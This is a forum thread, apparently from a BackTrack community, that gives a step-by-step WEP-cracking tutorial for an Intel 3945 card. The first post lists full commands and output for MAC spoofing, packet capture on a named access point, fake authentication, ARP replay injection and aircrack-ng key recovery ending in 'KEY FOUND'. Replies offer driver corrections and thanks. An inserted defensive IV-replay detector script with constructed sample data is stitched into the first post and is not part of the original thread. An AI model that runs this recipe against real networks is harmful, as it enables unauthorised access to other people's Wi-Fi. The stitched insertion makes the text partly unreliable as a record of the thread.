
Thread: Intel 3945 Injection & Fixes For Aircrack-ng BT3 Beta

  1. #1
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    In between the two: BackTrack is 4, FwdTrack4
    Posts
    854

    Intel 3945 Injection & Fixes For Aircrack-ng BT3 Beta

    PLEASE USE A COLOR EVERYONE CAN READ. Not everyone uses the black razor style. Some of us like the default style, which is mainly white. Thank you for your cooperation. ---Pureh@te



    Remove the old aircrack-ng 0.9, or whatever version you have:
    bt ~ # make uninstall

    Download:
    bt ~ # svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
    bt ~ # cd aircrack-ng
    bt aircrack-ng # gmake SQLITE=true
    bt aircrack-ng # gmake SQLITE=true install

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wmaster0 no wireless extensions.

    wlan0 IEEE 802.11g ESSID:"" Nickname:""
    Mode:Managed Channel:0 Access Point: Not-Associated
    Tx-Power=0 dBm
    Retry min limit:7 RTS thr:off Fragment thr=2346 B
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0


    bt ~ # modprobe -r iwl3945
    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    bt ~ # modprobe ipwraw

    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wifi0 unassociated ESSID:off/any
    Mode:Monitor Channel=1 Bit Rate=54 Mb/s

    rtap0 no wireless extensions.

    Here you are. You have enabled your Intel 3945 NIC to do discovery/injection and penetration testing.

    bt ~ # ifconfig wifi0 down
    bt ~ # macchanger --mac 00:10:20:30:40:50 wifi0
    Current MAC: 00:ab:ab:ab:ab:ab (unknown)
    Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)
    MAC spoofing for security. Up to you :)
    bt ~ # ifconfig wifi0 up
    bt ~ # ifconfig wifi0
    wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00
    UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:2346 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)
    Interrupt:19 Base address:0x6000 Memory:f4300000-f4300fff
    bt ~ # airmon-ng start wifi0

    Interface Chipset Driver

    wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)


    bt ~ # airodump-ng wifi0

    Get the SSID of your network AP, and stop using Ctrl+C because we don't want to unnecessarily capture other APs' data.

    bt ~ # airodump-ng -c 11 -w pentest --bssid 00:08:5C:7B:9E:B5 wifi0
    (let the airodump window keep running to capture enough packets)

    CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara

    BSSID STATION PWR Rate Lost Packets Probes

    00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393

    bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
    13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11

    13:35:08 Sending Authentication Request (Open System) [ACK]
    13:35:08 Authentication successful
    13:35:08 Sending Association Request [ACK]
    13:35:08 Association successful :-)

    bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
    13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11
    Saving ARP requests in replay_arp-0220-133556.cap
    You should also start airodump-ng to capture replies.
    Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets...(499 pps)

    bt ~ # aircrack-ng -n 64 --bssid 00:08:5C:7B:9E:B5 pentest-01.cap
    Opening pentest-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 54722 ivs.
    KEY FOUND! [ 98:45:00:88:57 ]
    Decrypted correctly: 100%

    I hope this tutorial will help all the people having an Intel 3945 NIC for penetration testing and vulnerability testing. Thanks a lot to exploitz for making such wonderful tutorials and videos. If you find any mistake, please let me know and I will correct it. I am happy to be a proud member of this forum, so full of knowledge, with lots of tutorials.
    Tested On:
    My laptop Specification
    compaq presario v3000(v3607TU)
    Dual Core 1.6 GHz With 1 MB L2 Cache
    Intel 956GM Chipset
    120 GB HDD
    4 GB Transcend DDR2 667 MHz RAM
    Intel X3100 PCI-E
    Running OS: BackTrack 3 Beta, dual boot with Windows Vista
    VMware on Vista running OS: Windows Server 2003 Enterprise Edition with IIS 6.0/ADS, Windows XP Professional with SP3 latest updated, Sun Solaris 10, BackTrack 3

    My Computer Specification
    Pentium 4 1.7 GHz PGA 478 socket
    Intel 850 MB original MB
    1 GB RDRAM PC800 Samsung
    200 GB HDD IDE Seagate Barracuda 7200 RPM 160 GB + Seagate Barracuda 5400 RPM 40 GB
    Asus Geforce 2 GTS 128 MB AGP 4x
    Running OS: Windows XP Pro with SP3, dual boot with BT 3 Beta kernel 2.6.21.5

    Here are proofs
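
The ARP request replay shown in the first post resends one captured WEP frame over and over, so the access point receives the same IV from one transmitter hundreds of times a second, while an ordinary client repeats an IV only for link-layer retries. The shell function below is an added example for the defending side, not part of the thread or of aircrack-ng, and it flags that pattern. The three-column frame log format, the function names, the second MAC address, the IV value and the sample traffic are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag transmitters that resend one WEP IV many times.
# Input (constructed format), one received data frame per line:
#   <epoch-second> <transmitter-MAC> <24-bit IV as hex>

# detect_iv_replay MIN_REPEATS   (frame records on stdin)
# Prints "<MAC> <IV> <peak>" for each (MAC, IV) pair seen at least
# MIN_REPEATS times within one second. Set MIN_REPEATS above the link-layer
# retry limit, since a legitimate retransmission also repeats the IV.
detect_iv_replay() {
    awk -v min="$1" '
        NF == 3 {
            pair = $2 SUBSEP $3
            n[$1 SUBSEP pair]++
            if (n[$1 SUBSEP pair] > peak[pair]) peak[pair] = n[$1 SUBSEP pair]
        }
        END {
            for (pair in peak) {
                if (peak[pair] >= min) {
                    split(pair, f, SUBSEP)
                    print f[1], f[2], peak[pair]
                }
            }
        }' | sort
}

# Constructed sample traffic: a normal client using a fresh IV per frame,
# and a station replaying one frame 499 times in a second (the rate in
# the aireplay-ng output above).
sample_frames() {
    i=0
    while [ "$i" -lt 20 ]; do
        printf '1203514556 00:aa:bb:cc:dd:01 %06x\n' "$i"
        i=$((i + 1))
    done
    i=0
    while [ "$i" -lt 499 ]; do
        printf '1203514556 00:10:20:30:40:50 3f9a1c\n'
        i=$((i + 1))
    done
}

sample_frames | detect_iv_replay 50
```

On a network that still has to run WEP, an alert like this is a sign that key recovery is in progress; the lasting fix is moving the AP to WPA2 or later.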





  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    secure_it, I'm a little unclear as to why you wrote this. It's not that we as a community don't appreciate the input; however, there are a lot of unnecessary steps in your tutorial.

    Backtrack 3 beta already has the drivers for the ipw3945. The drivers are located in the /usr/src/drivers folder. The iwlwifi drivers are for connecting and surfing the net and the ipwraw drivers are for injection. There was a small issue with the KDE menu links which I fixed the first day and posted to the wiki. The menu fixes will load and unload the drivers perfectly.

    Another important fact about these drivers you forgot to mention is that you must always UNLOAD one before loading the other one.

    I'm not picking on you at all and I appreciate the work you must have spent on this. I'm just pointing out that most of this stuff is included in Backtrack 3 beta already and is ready to go.

    So if anyone is using this tutorial, they can make the menu fixes and then start at the airodump-ng part.

    I will however move this to the tutorial section.

  3. #3
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543


    Also (deja vu) I just mentioned to someone else in another post about this issue:

    http://forums.remote-exploit.org/sho...ght=ipw3945.sh
    dd if=/dev/swc666 of=/dev/wyze

  4. #4
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    In between the two: BackTrack is 4, FwdTrack4
    Posts
    854


    Thanks for your valuable opinions, pureh@te. My intention was just to clear the doubts about "can Intel 3945 inject packets", that's it. Because I found many users were wondering about aircrack-ng freezing while using Intel 3945 drivers, or some confusion about whether the Intel 3945 is able to inject or monitor with airodump. So I thought to make things clear and collect them in a single place to prove the Intel 3945 can inject using ipwraw drivers, and I have used modprobe to load/unload drivers. Anyway, thanks for all that you have mentioned regarding fixes. I am glad to say that I am contributing something to this forum, and to take help and give help to newbies there. Thanks once again to all senior members out there.



    Secure_it
    M.Sc(IT),DOEACC A Level,MCSE:Security,Comptia Security+,Cisco CCNA,EC CEH
    Next Target Offensive Security 101v2 & Wifoo.

  5. #5
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    6


    Hey, good, lol, this will help a few people. And one more thing: I think that is a 64-bit WEP key, not 128, what you got: KEY FOUND! [ 98:45:00:88:57 ]


    Evil Monkey
    (You are entering the lands of packets, brute force and misuse of trust.
    This is a dark land. Full of problems and choices. Be careful when you use your knowledge. Be also careful with your tools and weapons. Never underestimate your enemy.)

  6. #6
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    5

    comments...

    secure_it
    you told me to come here check your post, so here are my comments:

    There is a new ipwraw-ng version available... You should have referred to it instead of 2.0.0
    The newest file in ASPj's page is now ipwraw-ng-2.3.4-04022008.tar.bz2
    The best would be to go to /usr/src/drivers and put the new version there, on top of the old one.

    Some unnecessary steps:
    • bt ~ # depmod -ae (the driver's "make install" already does it)
    • remove old aircrack-ng 0.9 or whatever version you have (I think the executable files have the same name as old ones, so you just need to install the new version over the old)
    • bt aircrack-ng #gmake SQLITE=true (is this really necessary?...)
    • Restart the system (is it necessary? if you're using a live CD this will make you lose what you've done until now...)

    All those iwconfig aren't needed also, but it's nice to have them there. It provides useful info to the target viewers of your post so they can know if they're doing things right at each step.
    And if they do the things right, they'll be happy and won't come here to ask questions.
    Nice to see a complete guide like this, showing that the card works, and how.

  7. #7
    Junior Member
    Join Date
    Oct 2007
    Posts
    59


    Very nice, secure_it... definitely one of the best, most complete and understandable tutorials I've seen around.

    Thanks.
    CPU: Mobile DualCore Intel Core 2 Duo T7200, 2000 MHz (12 x 167)- 2Ghz
    Chipset: Mobile Intel Calistoga i945PM
    RAM: 2048 Mb (DDR2-667 DDR2 SDRAM)
    Graphics Card: NVIDIA GeForce Go 7950 GTX (512 Mb)
    Audio: SigmaTel STAC9200 @ Intel 82801GBM ICH7-M - High Definition Audio Controller [A-1]
    Network Card: Broadcom NetXtreme 57xx Gigabit Controller
    Wireless Card: Intel® PRO/Wireless 3945ABG Network Connection
    Modem: Conexant HDA D110 MDC V.92 Modem

  8. #8
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    In between the two: BackTrack is 4, FwdTrack4
    Posts
    854


    Thanks, dude. It's all because of tutorials/posts around in remote exploit, wifiway, aircrack-ng forums and Google, and specially the tutorials by Xploitz.

  9. #9
    Junior Member
    Join Date
    Oct 2007
    Posts
    59


    Yeah, but you've put it into one comprehensive tutorial. By the way, I didn't quite understand if all the commands are correct or not? So in theory, if I did that all, I should be able to inject?

    (purehate said something about unmounting, did you put those in?)

    Thanks.

  10. #10
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    In between the two: BackTrack is 4, FwdTrack4
    Posts
    854


    Things will work absolutely fine if you follow this tutorial; then you will be able to inject packets on your AP and can check how insecure WEP is to use today. Well, I have done all things correctly, and mounting and dismounting drivers is modprobing them. Check that. Thanks for watching, and please let me know things are working fine at your end too. If there is any conflict, post it here, and if success, then please let me know.



    Secure_it
